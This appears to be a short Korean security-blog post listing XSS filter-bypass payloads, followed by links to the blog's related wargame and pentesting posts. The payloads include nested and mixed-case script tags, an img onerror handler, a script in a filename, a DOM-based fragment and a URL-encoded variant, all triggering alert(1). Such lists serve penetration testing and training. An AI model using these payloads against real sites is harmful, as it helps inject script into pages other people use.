1. 기본 구문
<script>>alert(1)</script>
2. 문자열 치환 구문
<script<script>>alert(1)</scrip</script>t>
<sCript>alert(1)</scRIpT>
3. HTML <img> 태그와 onerror 속성을 이용하여 정규표현식 우회
<img src=x onerror=alert(1)>
4. 파일명에 스크입트 구문 삽입
filename="<body onload=alert("XSS")>.jpg"
5. Dom Based XSS
.php#<script>alert(1)</script>
6. URL 디코딩 구문으로 우회
%3Cscript%3E%3Ealert(1)%3C%2Fscript%3E
'Security > Web' 카테고리의 다른 글
| [XSS] 우회 구문 (0) | 2022.03.02 |
|---|---|
| [etc] Windows에서 sudo 명령어 사용하기 (0) | 2021.10.27 |
| [pentesterlab] XSS (0) | 2021.09.09 |
| [Webhacking.kr] challenge(old)_(1) (0) | 2021.09.08 |
| [Dreamhack] Wargame_(1) (0) | 2021.09.08 |
